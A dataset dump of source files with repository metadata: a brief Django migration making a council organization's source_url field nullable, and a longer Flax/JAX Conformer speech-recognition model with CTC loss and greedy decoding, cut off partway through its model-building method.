"ref": "refs/heads/master",
"path": "for_keep/python_work.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "16424"
},
{
"name": "JavaScript",
"bytes": "54587"
},
{
"name": "Makefile",
"bytes": "8885"
},
{
"name": "Python",
"bytes": "240687"
},
{
"name": "Shell",
"bytes": "7265"
},
{
"name": "TeX",
"bytes": "93674"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Allow Organization.source_url to be empty (blank/null)."""

    dependencies = [
        ('councilmatic_core', '0012_auto_20161012_1218'),
    ]

    operations = [
        migrations.AlterField(
            model_name='organization',
            name='source_url',
            field=models.CharField(max_length=255, null=True, blank=True),
        ),
    ]
| {
"content_hash": "887780acdd40b95eaf88119183554203",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 74,
"avg_line_length": 23.444444444444443,
"alnum_prop": 0.6137440758293838,
"repo_name": "datamade/django-councilmatic",
"id": "258843f4776a650eb3e9bdf6318977a5570de31a",
"size": "494",
"binary": false,
"copies": "1",
"ref": "refs/heads/2.5",
"path": "councilmatic_core/migrations/0013_auto_20161012_1414.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "73072"
},
{
"name": "HTML",
"bytes": "164464"
},
{
"name": "Java",
"bytes": "504830"
},
{
"name": "JavaScript",
"bytes": "78854"
},
{
"name": "Python",
"bytes": "202625"
}
],
"symlink_target": ""
} |
r"""Conformer.
This model uses a conformer network to convert speech to text.
paper : https://arxiv.org/abs/2005.08100
high-level overview of Conformer encoder layer.
x = x + 0.5 * FeedForward(x)
x = x + MHSA(x)
x = x + ConvolutionBlock(x)
x = x + 0.5 * FeedForward(x)
y = layer_norm(x)
"""
import math
from typing import Any, List
from flax import linen as nn
from flax import struct
from init2winit.model_lib import base_model
from init2winit.model_lib import librispeech_preprocessor as preprocessor
from init2winit.model_lib import lingvo_attention
from init2winit.model_lib import spectrum_augmenter
import jax
import jax.numpy as jnp
from ml_collections.config_dict import config_dict
import numpy as np
# Default hyperparameters for training the Conformer CTC model. A single
# ConfigDict carries both the optimization settings and the architecture
# knobs consumed by ConformerConfig below.
DEFAULT_HPARAMS = config_dict.ConfigDict(
    dict(
        activation_function='relu',
        # Adam settings (transformer-style beta2=0.98).
        optimizer='adam',
        opt_hparams={
            'beta1': .9,
            'beta2': .98,
            'epsilon': 1e-9,
            'weight_decay': 0.0
        },
        lr_hparams={
            'base_lr': 0.1,
            'schedule': 'constant'
        },
        batch_size=256,
        eval_batch_size=128,
        l2_decay_factor=1e-6,
        l2_decay_rank_threshold=0,
        use_shallue_label_smoothing=False,
        rng_seed=-1,
        model_dtype='float32',
        grad_clip=5.0,
        # Conformer architecture.
        encoder_dim=512,
        num_attention_heads=8,
        num_encoder_layers=16,
        convolution_kernel_size=5,
        # SpecAugment (https://arxiv.org/abs/1904.08779) settings.
        freq_mask_count=2,
        freq_mask_max_bins=27,
        time_mask_count=10,
        time_mask_max_frames=40,
        time_mask_max_ratio=0.05,
        time_masks_per_frame=0.0,
        use_dynamic_time_mask_max_frames=True,
        use_specaug=True,
        residual_dropout_rate=0.1,
        input_dropout_rate=0.1,
        enable_decoder_pre_layer_norm=True,
        enable_conformer_post_layer_norm=True,
        use_lingvo_attention=False,
        total_accumulated_batch_size=None,))
@struct.dataclass
class ConformerConfig:
  """Global hyperparameters used to minimize obnoxious kwarg plumbing."""
  # Output vocabulary size of the final projection (CTC label set).
  vocab_size: int = 0
  dtype: Any = jnp.float32
  # Model width / depth.
  encoder_dim: int = 0
  num_attention_heads: int = 0
  num_encoder_layers: int = 0
  # Dropout rates for the individual sub-blocks.
  attention_dropout_rate: float = 0.0
  attention_residual_dropout_rate: float = 0.1
  input_dropout_rate: float = 0.0
  conv_residual_dropout_rate: float = 0.0
  feed_forward_dropout_rate: float = 0.0
  feed_forward_residual_dropout_rate: float = 0.1
  # Convolution block / subsampling geometry.
  convolution_kernel_size: int = 5
  feed_forward_expansion_factor: int = 4
  conv_expansion_factor: int = 2
  conv_subsampling_factor: int = 2
  conv_subsampling_layers: int = 2
  # Train-time behavior (dropout, batch-norm stats updates, specaug).
  train: bool = False
  use_specaug: bool = False
  freq_mask_count: int = 1
  freq_mask_max_bins: int = 15
  time_mask_count: int = 1
  time_mask_max_frames: int = 50
  time_mask_max_ratio: float = 1.0
  time_masks_per_frame: float = 0.0
  use_dynamic_time_mask_max_frames: bool = False
  # Batch-norm defaults copied from lingvo (see BatchNorm below).
  batch_norm_momentum: float = 0.999
  batch_norm_epsilon: float = 0.001
  # Optional layer norms and alternative attention implementation.
  enable_conformer_post_layer_norm: bool = False
  enable_decoder_pre_layer_norm: bool = False
  use_lingvo_attention: bool = False
class LayerNorm(nn.Module):
  """Layer normalization over the trailing feature axis.

  Same scheme as https://arxiv.org/pdf/1607.06450.pdf. Unlike the flax
  default, the learned scale is zero-initialized and applied as
  (1 + scale), so the layer starts out as a plain normalization.
  """
  dim: int = 0
  epsilon: float = 1e-6

  def setup(self):
    self.scale = self.param('scale', nn.initializers.zeros, [self.dim])
    self.bias = self.param('bias', nn.initializers.zeros, [self.dim])

  @nn.compact
  def __call__(self, inputs):
    mu = jnp.mean(inputs, axis=[-1], keepdims=True)
    centered = inputs - mu
    sigma_sq = jnp.mean(jnp.square(centered), axis=[-1], keepdims=True)
    normalized = centered * jax.lax.rsqrt(sigma_sq + self.epsilon)
    return normalized * (1 + self.scale) + self.bias
class Subsample(nn.Module):
  """Module to perform strided convolution in order to subsample inputs.

  Attributes:
    encoder_dim: model dimension of conformer.
    input_dropout_rate: dropout rate for inputs.
  """
  encoder_dim: int = 0
  input_dropout_rate: float = 0.0

  @nn.compact
  def __call__(self, inputs, input_paddings, train):
    output_paddings = input_paddings
    # Add a trailing channel axis so the 2-D convolutions below apply.
    outputs = jnp.expand_dims(inputs, axis=-1)
    # Two stride-2 convolutions => overall 4x subsampling in time.
    outputs, output_paddings = Conv2dSubsampling(
        input_channels=1, output_channels=self.encoder_dim)(outputs,
                                                            output_paddings)
    outputs, output_paddings = Conv2dSubsampling(
        input_channels=self.encoder_dim,
        output_channels=self.encoder_dim)(outputs, output_paddings)
    # Fold the (frequency, channel) axes into one feature axis.
    batch_size, subsampled_lengths, subsampled_dims, channels = outputs.shape
    outputs = jnp.reshape(
        outputs, (batch_size, subsampled_lengths, subsampled_dims * channels))
    outputs = nn.Dense(
        self.encoder_dim,
        use_bias=True,
        kernel_init=nn.initializers.xavier_uniform())(outputs)
    # Sinusoidal positional information is added here, once, before the
    # encoder stack.
    outputs = outputs + AddPositionalEmbedding(embedding_dim=self.encoder_dim)(
        seq_length=outputs.shape[1])
    outputs = nn.Dropout(
        rate=self.input_dropout_rate, deterministic=not train)(
            outputs)
    return outputs, output_paddings
class Conv2dSubsampling(nn.Module):
  """Helper module used in Subsample layer.

  1) Performs strided convolution over inputs and then applies non-linearity.
  2) Also performs strided convolution over input_paddings to return the correct
  paddings for downstream layers.
  """
  input_channels: int = 0
  output_channels: int = 0
  # NOTE(review): annotated List[int] but the default is a tuple; a tuple
  # type would be more accurate.
  filter_stride: List[int] = (2, 2)
  padding: str = 'SAME'

  def setup(self):
    # 3x3 kernel; params created here (not in __call__) so both the data
    # conv and the bias share one definition site.
    self.filter_shape = (3, 3, self.input_channels, self.output_channels)
    self.kernel = self.param('kernel', nn.initializers.xavier_uniform(),
                             self.filter_shape)
    self.bias = self.param('bias', lambda rng, s: jnp.zeros(s, jnp.float32),
                           self.output_channels)

  @nn.compact
  def __call__(self, inputs, paddings):
    # Computing strided convolution to subsample inputs.
    feature_group_count = inputs.shape[3] // self.filter_shape[2]
    outputs = jax.lax.conv_general_dilated(
        lhs=inputs,
        rhs=self.kernel,
        window_strides=self.filter_stride,
        padding=self.padding,
        rhs_dilation=(1, 1),
        dimension_numbers=('NHWC', 'HWIO', 'NHWC'),
        feature_group_count=feature_group_count)
    # Broadcast the bias over all leading axes.
    outputs += jnp.reshape(self.bias, (1,) * (outputs.ndim - 1) + (-1,))
    outputs = nn.relu(outputs)
    # Computing correct paddings post input convolution.
    # Pad the padding vector up to a multiple of the stride, then run a
    # stride-2 "conv" with an all-ones 1x1 kernel to pick every other entry.
    input_length = paddings.shape[1]
    stride = self.filter_stride[0]
    pad_len = (input_length + stride - 1) // stride * stride - input_length
    out_padding = jax.lax.conv_general_dilated(
        lhs=paddings[:, :, None],
        rhs=jnp.ones([1, 1, 1]),
        window_strides=self.filter_stride[:1],
        padding=[(0, pad_len)],
        dimension_numbers=('NHC', 'HIO', 'NHC'))
    out_padding = jnp.squeeze(out_padding, axis=-1)
    # Mask outputs by correct paddings to ensure padded elements in inputs map
    # to padded value in outputs.
    outputs = outputs * (1.0 -
                         jnp.expand_dims(jnp.expand_dims(out_padding, -1), -1))
    return outputs, out_padding
class FeedForwardModule(nn.Module):
  """Feedforward block of conformer layer.

  Layer norm, expansion to encoder_dim * feed_forward_expansion_factor with
  a swish non-linearity, then projection back to encoder_dim. Dropout is
  applied after each dense layer and padded positions are re-zeroed with
  padding_mask.
  """
  config: ConformerConfig

  @nn.compact
  def __call__(self, inputs, padding_mask=None, train=False):
    """Applies the feedforward block.

    Args:
      inputs: [batch, time, encoder_dim] activations.
      padding_mask: [batch, time, 1] mask, 1.0 for valid frames. If None,
        every position is treated as valid.
      train: enables dropout when True.

    Returns:
      [batch, time, encoder_dim] activations.
    """
    config = self.config

    # The declared default of None was previously unusable (`array * None`
    # raises); interpret a missing mask as "no padding" so the default is
    # meaningful while explicit callers are unaffected.
    if padding_mask is None:
      padding_mask = jnp.ones_like(inputs[..., :1])

    inputs = LayerNorm(dim=config.encoder_dim)(inputs)
    inputs = nn.Dense(
        config.encoder_dim * config.feed_forward_expansion_factor,
        use_bias=True,
        kernel_init=nn.initializers.xavier_uniform())(
            inputs)
    inputs = nn.swish(inputs)
    inputs = nn.Dropout(rate=config.feed_forward_dropout_rate)(
        inputs, deterministic=not train)
    inputs = inputs * padding_mask
    inputs = nn.Dense(
        config.encoder_dim,
        use_bias=True,
        kernel_init=nn.initializers.xavier_uniform())(
            inputs)
    inputs = inputs * padding_mask
    inputs = nn.Dropout(rate=config.feed_forward_residual_dropout_rate)(
        inputs, deterministic=not train)
    return inputs
class AddPositionalEmbedding(nn.Module):
  """Sinusoidal (Transformer-style) positional embeddings.

  Attributes:
    min_timescale: smallest timescale of the geometric progression.
    max_timescale: largest timescale of the geometric progression.
    embedding_dim: dimension of the produced embedding.
  """
  min_timescale: int = 1
  max_timescale: int = 10_000
  embedding_dim: int = 512

  @nn.compact
  def __call__(self, seq_length):
    positions = jnp.arange(seq_length, dtype=jnp.float32)[jnp.newaxis, :]
    half_dim = self.embedding_dim // 2
    # Geometric progression of timescales between min and max.
    log_increment = (
        math.log(float(self.max_timescale) / float(self.min_timescale)) /
        jnp.maximum(jnp.asarray(half_dim, dtype=jnp.float32) - 1, 1))
    inv_timescales = self.min_timescale * jnp.exp(
        jnp.arange(half_dim, dtype=jnp.float32) * -log_increment)
    angles = (
        positions[:, :, jnp.newaxis] *
        inv_timescales[jnp.newaxis, jnp.newaxis, :])
    embedding = jnp.concatenate(
        [jnp.sin(angles), jnp.cos(angles)],
        axis=2).astype(jnp.float32)
    # np.mod (not jnp) keeps the pad width a static Python int at trace
    # time; it pads one zero channel when embedding_dim is odd.
    return jnp.pad(embedding,
                   [[0, 0], [0, 0], [0, np.mod(self.embedding_dim, 2)]])
# Adapted from lingvo attention layer for query scaling
# https://github.com/tensorflow/lingvo/blob/7de4ca8fff3cb28c2ecb21bbd7b02a964ce727f7/lingvo/jax/layers/attentions.py#L201
class QueryScaler(nn.Module):
  """Learned per-dimension scaling applied to attention queries."""
  dim: int = 0

  def setup(self):
    self.scale = self.param('scale', nn.initializers.zeros, [self.dim])

  @nn.compact
  def __call__(self, inputs):
    if inputs.shape[-1] != self.dim:
      raise ValueError('QueryScaler expects inputs to have'
                       ' same last dimension as scaling param.')
    # 1.0/jax.nn.softplus(0.0) = 1.442695041. Hard code this number so that we
    # can avoid unnecessary XLA op fusion mess on TPU.
    r_softplus_0 = 1.442695041
    factor = jnp.array(r_softplus_0, dtype=inputs.dtype)
    factor *= jax.nn.softplus(self.scale)
    return inputs * factor
# Modifying flax linen default dot product attention function to add
# query scaling, reference to original function here :
# https://github.com/google/flax/blob/a9af38085a7a49b571cf37d375060fd683e74972/flax/linen/attention.py#L121
def dot_product_attention(query,
                          key,
                          value,
                          bias=None,
                          mask=None,
                          broadcast_dropout=True,
                          dropout_rng=None,
                          dropout_rate=0.,
                          deterministic=False,
                          dtype=jnp.float32,
                          precision=None):
  """Computes dot-product attention given query, key, and value.

  This is the core function for applying attention based on
  https://arxiv.org/abs/1706.03762. It's slightly modified to add query scaling.
  It calculates the attention weights given query and key and combines the
  values using the attention weights.

  Note: query, key, value needn't have any batch dimensions.

  Args:
    query: queries for calculating attention with shape of
      `[batch..., q_length, num_heads, qk_depth_per_head]`.
    key: keys for calculating attention with shape of
      `[batch..., kv_length, num_heads, qk_depth_per_head]`.
    value: values to be used in attention with shape of
      `[batch..., kv_length, num_heads, v_depth_per_head]`.
    bias: bias for the attention weights. This should be broadcastable to the
      shape `[batch..., num_heads, q_length, kv_length]`.
      This can be used for incorporating causal masks, padding masks,
      proximity bias, etc.
    mask: mask for the attention weights. This should be broadcastable to the
      shape `[batch..., num_heads, q_length, kv_length]`.
      This can be used for incorporating causal masks.
      Attention weights are masked out if their corresponding mask value
      is `False`.
    broadcast_dropout: bool: use a broadcasted dropout along batch dims.
    dropout_rng: JAX PRNGKey: to be used for dropout
    dropout_rate: dropout rate
    deterministic: bool, deterministic or not (to apply dropout)
    dtype: the dtype of the computation (default: float32)
    precision: numerical precision of the computation see `jax.lax.Precision`
      for details.

  Returns:
    Output of shape `[batch..., q_length, num_heads, v_depth_per_head]`.
  """
  assert key.ndim == query.ndim == value.ndim, 'q, k, v must have same rank.'
  assert query.shape[:-3] == key.shape[:-3] == value.shape[:-3], (
      'q, k, v batch dims must match.')
  assert query.shape[-2] == key.shape[-2] == value.shape[-2], (
      'q, k, v num_heads must match.')
  assert key.shape[-3] == value.shape[-3], 'k, v lengths must match.'
  # compute attention weights
  # This is the only deviation from the stock flax implementation: the query
  # is run through the learned per-dimension QueryScaler first.
  query = QueryScaler(dim=query.shape[-1])(query)
  attn_weights = nn.dot_product_attention_weights(query, key, bias, mask,
                                                  broadcast_dropout,
                                                  dropout_rng, dropout_rate,
                                                  deterministic, dtype,
                                                  precision)
  # return weighted sum over values for each query position
  return jnp.einsum('...hqk,...khd->...qhd', attn_weights, value,
                    precision=precision)
class MultiHeadedSelfAttention(nn.Module):
  """Self attention sub-layer used in the Conformer layer.

  Input is first normalized using layer norm. Output is processed using
  multi-headed attention.

  Note: this attention implementation uses a learned scale parameter to scale
  query matrix before passing it to flax attention module.
  """
  config: ConformerConfig = None

  def setup(self):
    # The lingvo attention module is built unconditionally but only used
    # when config.use_lingvo_attention is set (see __call__).
    dim_per_head = self.config.encoder_dim // self.config.num_attention_heads
    self.self_attention = lingvo_attention.DotProductAttention(
        num_heads=self.config.num_attention_heads,
        hidden_dim=self.config.encoder_dim,
        input_dim=self.config.encoder_dim,
        dim_per_head=dim_per_head)

  def _get_large_negative_number(self, dtype):
    # A finite stand-in for -inf, scaled down (0.7x) to leave headroom for
    # subsequent arithmetic without overflowing.
    if jnp.issubdtype(dtype, jnp.inexact):
      dtype_max = jnp.finfo(dtype).max
    elif jnp.issubdtype(dtype, jnp.integer):
      dtype_max = jnp.iinfo(dtype).max
    else:
      raise ValueError('Unsupported dtype for inputs.')
    return jnp.asarray(-0.7 * dtype_max, dtype=dtype)

  def convert_paddings_to_mask(self, paddings, dtype=jnp.float32):
    # [batch, time] paddings -> [batch, 1, 1, time] additive attention mask.
    attention_mask = paddings[:, jnp.newaxis, jnp.newaxis, :]
    attention_mask *= self._get_large_negative_number(dtype)
    return attention_mask

  @nn.compact
  def __call__(self, inputs, paddings, train):
    config = self.config
    # Boolean mask for the flax path (True = attend); built from the
    # complement of the paddings.
    mask_paddings = 1 - paddings
    attention_mask = nn.make_attention_mask(
        mask_paddings > 0, mask_paddings > 0, dtype=jnp.float32)
    inputs = LayerNorm(dim=config.encoder_dim)(inputs)
    if self.config.use_lingvo_attention:
      # Lingvo path uses an additive mask instead of a boolean one.
      atten_mask = self.convert_paddings_to_mask(paddings, inputs.dtype)
      result = self.self_attention(
          query_vec=inputs,
          key_vec=inputs,
          value_vec=inputs,
          atten_mask=atten_mask)[0]
    else:
      result = nn.SelfAttention(
          num_heads=config.num_attention_heads,
          qkv_features=config.encoder_dim,
          decode=False,
          dtype=config.dtype,
          kernel_init=nn.initializers.xavier_uniform(),
          bias_init=nn.initializers.zeros,
          use_bias=True,
          broadcast_dropout=False,
          attention_fn=dot_product_attention,
          dropout_rate=config.attention_dropout_rate,
          deterministic=not train)(inputs, attention_mask)
    result = nn.Dropout(
        rate=config.attention_residual_dropout_rate, deterministic=not train)(
            result)
    return result
class BatchNorm(nn.Module):
  """Implements batch norm respecting input paddings.

  This implementation takes into account input padding by masking inputs before
  computing mean and variance.

  This is inspired by lingvo jax implementation of BatchNorm:
  https://github.com/tensorflow/lingvo/blob/84b85514d7ad3652bc9720cb45acfab08604519b/lingvo/jax/layers/normalizations.py#L92

  and the corresponding defaults for momentum and epsilon have been copied over
  from lingvo.
  """
  config: ConformerConfig

  def setup(self):
    dim = self.config.encoder_dim
    dtype = self.config.dtype
    # Running statistics live in the 'batch_stats' collection; gamma is
    # zero-initialized and applied as (1 + gamma), matching LayerNorm above.
    self.ra_mean = self.variable('batch_stats', 'mean',
                                 lambda s: jnp.zeros(s, dtype), dim)
    self.ra_var = self.variable('batch_stats', 'var',
                                lambda s: jnp.ones(s, dtype), dim)
    self.gamma = self.param('scale', nn.initializers.zeros, dim, dtype)
    self.beta = self.param('bias', nn.initializers.zeros, dim, dtype)

  @nn.compact
  def __call__(self, inputs, input_paddings, train):
    rank = inputs.ndim
    # Reduce over every axis except the trailing feature axis.
    reduce_over_dims = list(range(0, rank - 1))
    padding = jnp.expand_dims(input_paddings, -1)
    momentum = self.config.batch_norm_momentum
    epsilon = self.config.batch_norm_epsilon
    if train:
      # Masked mean/variance: padded frames contribute neither to the sums
      # nor to the element count.
      mask = 1.0 - padding
      sum_v = jnp.sum(inputs * mask, axis=reduce_over_dims, keepdims=True)
      count_v = jnp.sum(
          jnp.ones_like(inputs) * mask, axis=reduce_over_dims, keepdims=True)
      count_v = jnp.maximum(count_v, 1.0)
      mean = sum_v / count_v
      sum_vv = jnp.sum(
          (inputs - mean) * (inputs - mean) * mask,
          axis=reduce_over_dims,
          keepdims=True)
      var = sum_vv / count_v
      # Exponential moving average update of the running statistics.
      self.ra_mean.value = momentum * self.ra_mean.value + (
          1 - momentum) * mean
      self.ra_var.value = momentum * self.ra_var.value + (
          1 - momentum) * var
    else:
      mean = self.ra_mean.value
      var = self.ra_var.value
    inv = (1 + self.gamma) / jnp.sqrt(var + epsilon)
    bn_output = (inputs - mean) * inv + self.beta
    # Zero out padded frames in the output.
    bn_output *= 1.0 - padding
    return bn_output
class ConvolutionBlock(nn.Module):
  r"""Convolution block in conformer layer.

  architecture:

  input                # (batch, time, hidden_dim)
    |
  layer_norm(.)        # (batch, time, hidden_dim)
  dense(.), dense(.)   # (batch, time, 2 * hidden_dim)
    |      /
  glu(.)               # (batch, time, hidden_dim)
  depthwise_conv1d(.)
  batch_norm(.)
  act(.)
    |
  dense(.)
  dropout(.)
    |
  output
  """
  config: ConformerConfig

  @nn.compact
  def __call__(self, inputs, input_paddings, train):
    config = self.config
    inputs = LayerNorm(dim=config.encoder_dim)(inputs)
    # GLU gating: two parallel projections, one passed through a sigmoid.
    input_gated1 = nn.Dense(
        config.encoder_dim,
        kernel_init=nn.initializers.xavier_uniform(),
        use_bias=True)(inputs)
    input_gated2 = nn.Dense(
        config.encoder_dim,
        kernel_init=nn.initializers.xavier_uniform(),
        use_bias=True)(inputs)
    inputs = input_gated1 * jax.nn.sigmoid(input_gated2)
    # Zero out padded frames before convolving across time.
    inputs = inputs * (1 - jnp.expand_dims(input_paddings, -1))
    # Depthwise 1-D convolution (feature_group_count == encoder_dim).
    inputs = nn.Conv(
        features=config.encoder_dim,
        kernel_size=(config.convolution_kernel_size,),
        strides=(1,),
        padding='SAME',
        feature_group_count=config.encoder_dim,
        use_bias=False,
        kernel_init=nn.initializers.xavier_uniform())(inputs)
    inputs = BatchNorm(config)(inputs, input_paddings, train)
    inputs = nn.swish(inputs)
    inputs = nn.Dense(
        config.encoder_dim,
        kernel_init=nn.initializers.xavier_uniform())(inputs)
    inputs = nn.Dropout(
        rate=config.conv_residual_dropout_rate, deterministic=not train)(inputs)
    return inputs
class ConformerBlock(nn.Module):
  """Single conformer encoder layer (macaron structure).

  High level overview:
    x = x + 0.5 * FeedForward(x)
    x = x + MHSA(x)
    x = x + ConvolutionBlock(x)
    x = x + 0.5 * FeedForward(x)
    y = layer_norm(x)   # only when enable_conformer_post_layer_norm
  """
  config: ConformerConfig

  @nn.compact
  def __call__(self, inputs, input_paddings, train):
    cfg = self.config
    # 1.0 for valid frames, broadcastable over the feature axis.
    padding_mask = jnp.expand_dims(1 - input_paddings, -1)
    x = inputs
    x = x + 0.5 * FeedForwardModule(config=cfg)(x, padding_mask, train)
    x = x + MultiHeadedSelfAttention(config=cfg)(x, input_paddings, train)
    x = x + ConvolutionBlock(cfg)(x, input_paddings, train)
    x = x + 0.5 * FeedForwardModule(config=cfg)(x, padding_mask, train)
    if cfg.enable_conformer_post_layer_norm:
      x = LayerNorm(dim=cfg.encoder_dim)(x)
    return x
class ConformerEncoderDecoder(nn.Module):
  """Conformer (encoder + decoder) block.

  Takes audio input signals and outputs probability distribution over vocab size
  for each time step. The output is then fed into a CTC loss which eliminates
  the need for alignment with targets.
  """
  config: ConformerConfig

  def setup(self):
    config = self.config
    # SpecAug is constructed once here; it is only applied in __call__ when
    # config.use_specaug and train are both set.
    self.specaug = spectrum_augmenter.SpecAug(
        freq_mask_count=config.freq_mask_count,
        freq_mask_max_bins=config.freq_mask_max_bins,
        time_mask_count=config.time_mask_count,
        time_mask_max_frames=config.time_mask_max_frames,
        time_mask_max_ratio=config.time_mask_max_ratio,
        time_masks_per_frame=config.time_masks_per_frame,
        use_dynamic_time_mask_max_frames=config
        .use_dynamic_time_mask_max_frames)

  @nn.compact
  def __call__(self, inputs, input_paddings, train):
    # Returns (logits over vocab_size per frame, output paddings).
    config = self.config
    outputs = inputs
    output_paddings = input_paddings
    # Compute normalized log mel spectrograms from input audio signal.
    preprocessing_config = preprocessor.LibrispeechPreprocessingConfig()
    outputs, output_paddings = preprocessor.MelFilterbankFrontend(
        preprocessing_config,
        per_bin_mean=preprocessor.LIBRISPEECH_MEAN_VECTOR,
        per_bin_stddev=preprocessor.LIBRISPEECH_STD_VECTOR)(
            outputs, output_paddings)
    # Ablate random parts of input along temporal and frequency dimension
    # following the specaug procedure in https://arxiv.org/abs/1904.08779.
    if config.use_specaug and train:
      outputs, output_paddings = self.specaug(outputs, output_paddings)
    # Subsample input by a factor of 4 by performing strided convolutions.
    outputs, output_paddings = Subsample(
        encoder_dim=config.encoder_dim,
        input_dropout_rate=config.input_dropout_rate)(outputs, output_paddings,
                                                      train)
    # Run the conformer encoder layers.
    for _ in range(config.num_encoder_layers):
      outputs = ConformerBlock(config)(outputs, output_paddings, train)
    if config.enable_decoder_pre_layer_norm:
      outputs = LayerNorm(config.encoder_dim)(outputs)
    # Run the decoder which in this case is a trivial projection layer.
    outputs = nn.Dense(
        config.vocab_size,
        use_bias=True,
        kernel_init=nn.initializers.xavier_uniform())(outputs)
    return outputs, output_paddings
class ConformerModel(base_model.BaseModel):
  """Conformer model that takes in log mel spectrograms as inputs.

  outputs probability distribution over vocab size for each time step.
  """

  # Adapted from lingvo's greedy decoding logic here:
  # https://github.com/tensorflow/lingvo/blob/2ee26814c57b7dcead3f0382170f2f3da006f810/lingvo/jax/layers/ctc_objectives.py#L138
  def sequence_mask(self, lengths, maxlen):
    """Build a (batch, maxlen) 0/1 mask where entry [b, t] is 1 iff t < lengths[b]."""
    batch_size = lengths.shape[0]
    a = jnp.ones([batch_size, maxlen])
    # Cumulative sum over a row of ones yields 1..maxlen per row.
    b = jnp.cumsum(a, axis=-1)
    c = jnp.less_equal(b, lengths[:, jnp.newaxis]).astype(lengths.dtype)
    return c

  def compute_loss(self, logits, logit_paddings, labels, label_paddings):
    """Return the summed CTC loss normalized by the number of real label tokens."""
    logprobs = nn.log_softmax(logits)
    per_seq_loss = self.loss_fn(logprobs, logit_paddings, labels,
                                label_paddings)
    # Number of non-padding label tokens across the whole batch.
    normalizer = jnp.sum(1 - label_paddings)
    # jnp.maximum guards against division by zero on an all-padding batch.
    normalized_loss = jnp.sum(per_seq_loss) / jnp.maximum(normalizer, 1)
    return normalized_loss

  def collapse_and_remove_blanks(self, labels, seq_length, blank_id: int = 0):
    """CTC-collapse per-frame labels: drop blanks and merge repeats.

    Args:
      labels: int array of shape (batch, time) with per-frame label ids.
      seq_length: int array of shape (batch,) with valid lengths in `labels`.
      blank_id: label id treated as the CTC blank.

    Returns:
      Tuple of (collapsed_labels, new_seq_length). `collapsed_labels` keeps
      the original (batch, time) shape, right-padded with zeros.
    """
    b, t = labels.shape
    # Zap out blank
    blank_mask = 1 - jnp.equal(labels, blank_id)
    labels = (labels * blank_mask).astype(labels.dtype)
    # Mask labels that don't equal previous label.
    label_mask = jnp.concatenate([
        jnp.ones_like(labels[:, :1], dtype=jnp.int32),
        jnp.not_equal(labels[:, 1:], labels[:, :-1])
    ], axis=1)
    # Filter labels that aren't in the original sequence.
    maxlen = labels.shape[1]
    seq_mask = self.sequence_mask(seq_length, maxlen=maxlen)
    label_mask = label_mask * seq_mask
    # remove repetitions from the labels
    ulabels = label_mask * labels
    # Count masks for new sequence lengths.
    label_mask = jnp.not_equal(ulabels, 0).astype(labels.dtype)
    new_seq_len = jnp.sum(label_mask, axis=1)
    # Mask indexes based on sequence length mask.
    # Output keeps the padded width so shapes stay static under jit.
    new_maxlen = maxlen
    idx_mask = self.sequence_mask(new_seq_len, maxlen=new_maxlen)
    # Flatten everything and mask out labels to keep and sparse indices.
    flat_labels = jnp.reshape(ulabels, [-1])
    flat_idx_mask = jnp.reshape(idx_mask, [-1])
    # size= keeps the nonzero result statically shaped; padded slots index 0.
    indices = jnp.nonzero(flat_idx_mask, size=b * t)[0]
    values = jnp.nonzero(flat_labels, size=b * t)[0]
    updates = jnp.take_along_axis(flat_labels, values, axis=-1)
    # Scatter to flat shape.
    flat = jnp.zeros(flat_idx_mask.shape).astype(labels.dtype)
    flat = flat.at[indices].set(updates)
    # 0'th position in the flat array gets clobbered by later padded updates,
    # so reset it here to its original value
    flat = flat.at[0].set(updates[0])
    # Reshape back to square batch.
    batch_size = labels.shape[0]
    new_shape = [batch_size, new_maxlen]
    return (jnp.reshape(flat, new_shape).astype(labels.dtype),
            new_seq_len.astype(seq_length.dtype))

  def greedy_decode(self, logits, logit_paddings):
    """Best-path CTC decode: per-frame argmax followed by blank/repeat collapse."""
    per_frame_max = jnp.argmax(logits, axis=-1)
    # Valid frame count per sequence (paddings are 1.0 at padded frames).
    seqlen = jnp.sum(1.0 - logit_paddings, axis=-1)
    hyp, _ = self.collapse_and_remove_blanks(per_frame_max, seqlen, blank_id=0)
    # After collapsing, remaining zeros are padding positions.
    hyp_paddings = jnp.equal(hyp, 0).astype(jnp.int32)
    return hyp, hyp_paddings

  def evaluate_batch(self, params, batch_stats, batch):
    """Evaluate normalized CTC loss and greedy-decode metrics on the given batch."""
    logits, logit_paddings = self.flax_module.apply(
        {
            'params': params,
            'batch_stats': batch_stats
        },
        batch['inputs'],
        batch['input_paddings'],
        train=False,
        mutable=False)
    labels = batch['targets']
    label_paddings = batch['target_paddings']
    normalized_loss = self.compute_loss(logits, logit_paddings, labels,
                                        label_paddings)
    hyps, hyp_paddings = self.greedy_decode(logits, logit_paddings)
    return self.metrics_bundle.gather_from_model_output(
        normalized_loss=normalized_loss,
        hyps=hyps,
        hyp_paddings=hyp_paddings,
        targets=labels,
        target_paddings=label_paddings,
        axis_name='batch')

  def training_cost(self, params, batch, batch_stats=None, dropout_rng=None):
    """Return CTC loss."""
    # For more information on flax.linen.Module.apply, see the docs at
    # https://flax.readthedocs.io/en/latest/flax.linen.html#flax.linen.Module.apply.
    # mutable=['batch_stats'] collects updated batch-norm statistics.
    (outputs, output_paddings), new_batch_stats = self.flax_module.apply(
        {
            'params': params,
            'batch_stats': batch_stats
        },
        batch['inputs'],
        batch['input_paddings'],
        rngs={'dropout': dropout_rng},
        mutable=['batch_stats'],
        train=True)
    labels = batch['targets']
    label_paddings = batch['target_paddings']
    normalized_loss = self.compute_loss(outputs, output_paddings, labels,
                                        label_paddings)
    return normalized_loss, new_batch_stats

  def apply_on_batch(self, params, batch_stats, batch, **apply_kwargs):
    """Wrapper around flax_module.apply."""
    # batch_stats is optional so callers without batch norm state can reuse this.
    if batch_stats is not None:
      variables = {'params': params, 'batch_stats': batch_stats}
    else:
      variables = {'params': params}
    return self.flax_module.apply(
        variables,
        batch['inputs'],
        batch['input_paddings'],
        **apply_kwargs)

  def build_flax_module(self):
    """Construct the ConformerEncoderDecoder module from the model hparams."""
    config = ConformerConfig(
        vocab_size=self.hps.output_shape[1],
        encoder_dim=self.hps.encoder_dim,
        num_attention_heads=self.hps.num_attention_heads,
        num_encoder_layers=self.hps.num_encoder_layers,
        convolution_kernel_size=self.hps.convolution_kernel_size,
        freq_mask_count=self.hps.freq_mask_count,
